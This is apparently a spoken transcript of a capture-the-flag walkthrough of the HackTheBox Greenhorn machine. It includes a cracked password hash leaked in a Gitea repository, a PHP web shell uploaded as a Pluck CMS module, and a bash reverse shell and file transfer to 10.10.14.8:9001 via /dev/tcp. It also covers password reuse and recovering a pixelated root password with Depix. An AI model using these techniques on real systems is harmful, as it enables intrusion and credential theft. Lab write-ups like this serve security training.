What's going on YouTube? This is Ipsec. I'm doing Greenhorn from HackTheBox, which was a relatively easy machine, but the root step could be tricky because it's very particular how you perform each step. The user steps straightforward as just exploiting Pluck CMS, and then when you get on the box, you discover a PDF that has like a new hire instructions, and there's a password that has been redacted via a pixelize effect. And whenever you redact things from a document, you should just use a black bar to put over top of the text. Whenever you use effects like pixelize, twirl, blur, things like that, there's always a good chance it can be reversed. And that's where the tricky part comes in. There is a tool called Depix that can unpixelize this image. However, you have to extract the image by right clicking on it in the PDF and saving it. Because if you have extra white space around the pixelized thing, it can throw the tool off and then you'll struggle a lot trying to get it working. So with that being said, let's just jump in. As always, we're going to start off with an nmap. So -sc for default scripts, -v enumerate versions, -vv for double verbose. This gives us things like the TTL. OA output all formats, put in the nmap directory and call it Greenhorn. And then the IP address of 10.10.11.25. This can take some time to run, so I've already ran it. Looking at the results, we have just 3 ports open. The first one being SSH on port 22, and the banner tells us it's an Ubuntu server. We also have HTTP on port 80. Its banner tells us it's Nginx, also running on Ubuntu. And the nmap script HTTP title tells us it's redirecting us to greenhorn.htb. So let's go ahead and add this to a host file. So do sudo v etc host. And then we can add 10.10.11.25 greenhorn.htb. And looking at the other things, there's not much else there. There is port 3000. Nmap doesn't tell us the protocol. However, looking at the scripts, we see a HTTP 400, so we know this is going to be a web server. And looking at the cookies it tries to set, we see I like Gitea, which is a source code repository, kind of like GitHub. So you know port 3000 has a source code repository. Port 80 is redirecting us to greenhorn.htb. So let's go take a look. So we'll do HTTP 10.10.11.25. And we get a welcome to Greenhorn page. And looking at the photo, we see it's powered by Pluck, which is a content management system. I think we've covered it once before. If I click on this admin, it takes us to login.php and wants a password to log in. We see it is Pluck version 4718. So let's go take a look for any type of exploit. So I'm just going to Google Pluck 4718 exploit. And let's see, there is remote shell upload, code execution. If we go to the actual CVE page, let's see, does this say anything? Does not restrict failed login, so that's not related to the shell upload. Let's see, local file inclusion. Looking at this, let's see, LFI, affected component, data modules, album, get image.php. So let's try this. Honestly, when I was solving the box, I didn't come across this CVE. So this is going to be live. I haven't tried this yet. So I'm going to send this over to Burp Suite and let's just see exactly what happens here. So intercept is on. Oh, actually, looking at this, I think this is the Pluck CVE we did on a previous box, looking at the get image. If I remember correctly, this local file inclusion, it hard codes to a specific directory. I forget exactly what box that was, but I bet if we looked into this, it goes to settings, modules, albums. Yes, this is hard coding us into a directory, right? Album POC. So I wonder if we can go there. So data settings modules. I'm going to go check this out real quick. So if we do data settings modules forbidden, it goes to albums. And that just redirects us. So there's no like index.php there. Albums POC, they have a past backup file. And that's not going to exist here. So I'm just going to move on to the next one. Let's see. If we look at the remote code execution, it wants a zip file. It does have a login. So this is going to be uploading a zip to what's the upload URL. It looks like it's going to install a module. So this is like adding a plugin to Pluck in order to get code execution. but we need to log in first. We can try the credentials admin bogus. So let's go back here. We can do bogus. Password's incorrect. I think they're trying all three of these. Cont1. No, they're trying admin user bogus password. Okay. So we need to get the actual password here. We could keep looking down Pluck, but I do want to go look at exactly what was on port 3000 before I go too far down one rabbit hole. So let's do HTTP, Greenhorn HTTP, port 3000. And we get the Gitea interface. We could register for an account, but if we just click on Explore, let's see what we have. We do have a repository from Green Admin, Greenhorn. There is one commit. That commit is from the user Junior. So we have a user on this box, and it's the first release of their source code. And looking at this, it looks like to be Pluck. So right now, I just want to see if this is the files on the server, or this is just like a source code repository. The big difference being if they just maintain the files on the server in GitHub, then all the settings are going to be also in GitHub. And if that happens, well, there's going to be like hard-coded credentials, right? So I went in data, went in settings. Now I'm looking for like config. Pass.php looks interesting. And we have this dub variable, which I'm guessing is the password since it's pass.php. So in reality, whenever you do things like this, pass.php probably should be in a get ignore file and should be like pass.php.example or something and just have dummy data here. And that way you just never upload this file to your server. The other common way to do it is through environment files. So like .env, and then don't put .env on GitHub. So let's see exactly what hash this is. So I'm going to do echo-n wc-c for word count 128. I want to say that's maybe SHA-256. Let's just test this out. So if we do SHA-256 sum, awk print 1. And let's see, let's just copy this, or we can just do a wc-c again. 65, so that's going to be 64 characters. Let's do a SHA-512 sum. And that's what it is. So we have a SHA-512 hash. So we could try to go to Hashcat and try to crack this, but whenever I just get a raw hash that doesn't have any salting or bcrypt or anything like that, I always just go to like CrackStation and then test it out first to see if it's already known. Is it crackstation.net maybe? Yes, it is. So we can paste this hash in, tell it I'm not a robot, and then click some with motorcycles. Okay. Crack hash not found. Is that the hash? I don't think it is. I think I copied. Yeah. I was going to say that didn't look like the right number of characters. Let's see. Fire hydrants. Okay. That should be good. I'm still not a robot. That's always good. And we get the password of I love you 1. So let's try log in. So we can do password I love you 1. And we get logged into Pluck. And then the CVE or the upload script was installing a malicious module and it wanted a zip file. So I'm just going to make a quick module real quick. I'm going to do make dir, let's do shell, and then we can go in shell, create shell.php. And then just do a quick PHP one-liner of system, then request. We'll do CMD like this. That looks fine. And let's zip it up. So we'll do zip shell. We need to add -r for recursive so it goes in the folder. Give it the file name of shell.zip. There we go. And let's see. We want to go to modules. Add module to website. That doesn't look right. Options, manage module, install a module. Browse. And let's go to our Greenhorn directory. And if this didn't work, then I'd start looking at the Greenhorn's source code to identify like what format a module needs to be in. But we just see it got installed. So I bet if we went to /data, is it modules? Then shell. And then shell.php. There we go. We have our shell. So if we do cmd equals who am I, we have dub data. So let's get a reverse shell real quick. If you're curious how I knew this data structure, we were just looking at it in the Gitea instance. So if we do Greenhorn HTB 3000, let me turn burp suite off. You can kind of see how it works. You could also look at that exploit proof of concept that I had up a minute ago. But if we look here, we have data, see, then modules. And I just assumed when you install a module, it unzips it to this directory, right? But right now, what we want to do is get this command over in burp suite so we can change it over to a post request easily. That just makes it easier for us to send the reverse shell. You can do it through the GET request, but there's more bad characters and it just makes it a bit of a pain, right? So we're going to put the reverse shell syntax in. Then we want to URL encode it and hope I can type and talk at the same time as we start up our listener. Send the code, internal server error. So I don't think we did that correctly. Let's see. CMD is equal to who am I? No input file found. What? Disable? Let's try installing the module again. Maybe there's some type of automated task that cleaned out the module or something. That is odd. Install. Let's go to shell.zip, upload, dub data. Okay, that does work. I think I lost the reverse shell, so let's just type that again. Dev TCP 10.10.14.8 9001. See bash-c, bash-i, internal server error. Did that really just happen again? Okay. So I'm going to try this one last time. If I don't get it in time, then we're just going to upload a PHP script that immediately gives us a reverse shell. Because something is not going well. Bash-c, bash-i. I don't have a n single quote. There we go. So now let's do a Python 3-c import pty spawn bin bash. And then stty raw minus echo foreground enter twice. We can export term is equal to x term. And that enables us to clear the screen. So let's see, what do we have? If we, well, normally my first step is like dumping the database and getting the password there, but we've already got the password to Pluck. There is no database, I think, because Pluck is like a file-based CMS. So, oh, there is a database. We have 3306 listening. Let's see. How do we get to that password? MySQL. Let's do -p. I love you 1. Access denied for that user. Let's see. It would be under settings, right? Data settings, grep-ri, MySQL. Let's see, 3306. Username. But if I do, let's just do dub. Okay, that gets that. So I don't think that database is really configured with Pluck. I don't know exactly what that is. 3306 isn't really in Pluck. Let's see. Requirements. Pluck does not. Yeah, so it's saying Pluck does not use MySQL. So we shouldn't find the MySQL password there. If we go cat etc fastwd grep for everything that ends in sh, We have a few users. We have root, git, and junior. We can try the password I love you for these users. So if you do su get and then I love you 1, and that fails, we could try junior, I love you 1, and that does work. So we can get access as junior. I still don't know exactly what MySQL is for. Normally when I switch users, I like just getting an SSH session and like getting a better shell that way. So we can do SSH junior at greenhorn.htb. Accept that, but SSH configured to only allow public keys. So if we wanted to SSH, we could make the directory SSH and then use a public key to log in. But let's see, what do we have? We have this openvast.pdf. So let's get that over to a box. So I'm going to start up another netcat list on port 9001. And I'm just going to call it openvast.pdf because I hate adding that space there. We can cat it and then direct it to dev tcp 10.10.14.8 9001 to send the file. And then I can just open it up and we can see. So we get, hello Junior, we have recently installed OpenVast on a server to monitor and identify potential vulnerabilities. Currently, only root user represented by myself has authorization, and they give this, and then they say enter password and give this this pixelated output. And whenever you're trying to censor something in documents, don't get fancy. Don't do any type of filter like a blur, a pixel image, a twirl, because a lot of times you can actually reverse these. It may not look like you can, but if we do a quick Google, let's see if we can find anything quickly. Depixelize image. I'm going to add GitHub to it to see if there's proof of concepts. Here we go. We have a script called Depix. And when you try to censor things, it's best to just put like a solid color, like a solid black box over top of the image. Let's see. So if we do Depix, we give it the image, we give it the debrune sequence. I think that's how you pronounce it. I don't know exactly, but we can look at that. Essentially, all this is going to do is it takes one of these big images. Let's do this, which is all the characters, right? And then it's going to blur it, like pixelize the image. And it's going to try to cut each pixelize of your image one by one. And then it sees where it's most alike on this image that's blurred. And then that's how it identifies it. It's kind of like those known plain text crypto attacks, right? There's a lot of just data loss here. So you may think we can't recover it. But if we knew the image that it started from, then there's a potential the amount of data loss doesn't matter, right? Because this block right here may only get generated from a capital H, the way these colors are set, right? So that's all this attack is doing. It's going to cut the text up in small bits and then see where it collides with on a pre-computed sample. So let's go ahead and try this out. I'm going to clone this. So let's do a git clone on Depix. We have the library. Now we want to get the pixelized image. So I'm going to right click here. I'm going to save image as, and we'll go HTB Greenhorn. I'm going to put it in the Depix directory I just created. I'm going to call it blur.png. Now it's very important that you put PNG as the extension because Depix is going to work with PNGs. If you do JPEG, it's actually going to create a JPEG image, which is pretty cool. I didn't know it could do that. I'm going to show you real quick. If we just do save image as, let's do HTB, Greenhorn, Depix, blur.jpg, right? And if we go in here, we have two blurs. If we MD5 sum both of them, hopefully they're different, right? I always thought like when you had this PDF and you right click and save it, it was just extracting this element and it wasn't doing any conversion of its own, but it looks like it's doing some type of conversion here. If we do a file on it, it's going to identify one's a JPEG, one's a PNG. I know what you're thinking. Maybe it's just doing that because of the extension, so we can xxd head -1. I thought that would get what? Blur.jpg. Let's just do them head -1 like this. And we can do PNG. And we see the headers are completely different. So there is some type of processing being done when we export the image by right-clicking on it. However, now we have the password or the pixelized image. What we want to do now is run Depix. So we give depix.py, we specify the blurred image, then we do the search images and give it an example of what we think the character set could be, and then a output. So we'll do Python 3, depix.py, blur.png. We need to do, what was the first argument? -p. -s is going to be the search images. Let's do the one they use first. Okay. And then -o, we'll do output.png. And let's see, cannot identify file image. What? File blur PNG. Oh. Maybe it is the same image. Hold on one second. When I was doing some bash foo, I guess, I clobbered the file. That's embarrassing. Save image. HTB, Greenhorn, Depix, blur PNG. Yes, replace it. So now if I do file blur PNG, we have to go in Depix. That is a PNG image. That does say PNG. The JPEG was different. So now let's run the Python script again. And that looks better. Okay. So right here, it is creating all the blocks, which is like building all the text, and it's going to take a couple minutes because it identifies, right? It's like, let's see. Imagine like a line gets drawn down here where my cursor's going and goes, okay, what character produces these blocks, right? That's essentially how it works. There is a blog post. So the debrusion sequence, that is going to be what we talked about. That's just the big image that has everything. Let's see. There is this. Let's see. Where is it? Author Dan Pedro, write up, source. Okay. This is good. I was hoping there was a blog post from this author that I could find. Here it is. So I would recommend reading this because that's going to explain kind of what we did, how it kind of breaks it up. Like when it's doing the pixelization, it takes the smiley face, breaks it up in quadrants, and then we have this. And if we knew it started from this, there's a chance we can reconstruct it, right? That's that sequence. Here is how it's doing that little search. This is not the post I was looking for, actually. There was one that said, like, this tool, it's kind of hard to use in the wild because you have to be, like, know the font, know the size, and have all that working beforehand, right? And then that's where Bishop Fox had created this tool, Unredactor, which should do a better job, but I had trouble running it. But if you want to learn more about depixelizing images, highly recommend going to this blog post and watching this video where Bishop Fox will talk about it. This is a good way to do it. It just doesn't work for this challenge. I don't know why it doesn't work for this challenge. I'm sure if we tweaked it and like got the font and everything correctly, we could get it working. I would show it, but also the unredacted proof of concept requires a GPU, which doesn't play well with my VM. So it's a pain to show in the video anyways, but I did want to talk about this. So if you're trying to depixelize an image and you're having trouble getting Depix to work, this is something I would check out, right? But we have this now finished. So if I do open output.png, we see an image. And it says side from side, the other side, side from side, the other side. So that is the password they're using with sudo. So I'm going to try that real quick. So we can do su dash side from side, the other side, side from side, the other side. And there we go. We log in. And I didn't put any spaces there. So it's just side, what was it? Side from side, the other side without any spaces. And that gets us root. So that's going to be the box. But before we end the video, I have one last question. What was MySQL used for? Because we saw it as www data listening, and then we tried to look for the password in Pluck and couldn't find it. And as root, we can generally just access MySQL. So we can just type MySQL, and we get logged in. So we can do show databases. And oh, Gitea. I forgot there were two web servers on this box, right? One was Gitea, one was Pluck. So Gitea is what's using MySQL. I bet if we do like select star from, is it user? There we go. We could get the password hash here. If we do, let's see, describe user, I think it's right there. Yeah. Let's see, what is it? Probably name, passwd, and hash algorithm, probably. So I can do select name, passwd from user. If I don't have the algorithm, we just get the hash, right? If we want to add the hash algo, there we go. This is looking like it is. So I'm guessing if we went to hashcat, we'd crack something like this, right? That's normally what they look like, but we don't really care about that. What I care about, could I have accessed this from www data, right? So let's find out exactly where Gitea is storing the config. If we go etc nginx, let's do sites enabled. Looks like it's not here. It's not part of nginx. Let's see. I'm going to grep for 3000 in this etc. And let's see, we see it in, oh, there's a Gitea. So if we go in etc Gitea, we can cat app.ini. And let's see, is this where MySQL password is? App name, MySQL, yes it is. So we have root, and there's the root password for Gitea. So the question is, what is the permission of this file? And only the Git user can read write to it. And I don't think www data was actually a member of Git. So if we do exit twice, we're back here. If we do group, it's probably groups to list our groups. www data, etc, Gitea, permission denied. So we can't go in and read app.ini to get the password. So that's going to wrap up the video. Hope you guys enjoyed it. Take care, and I will see you all next time.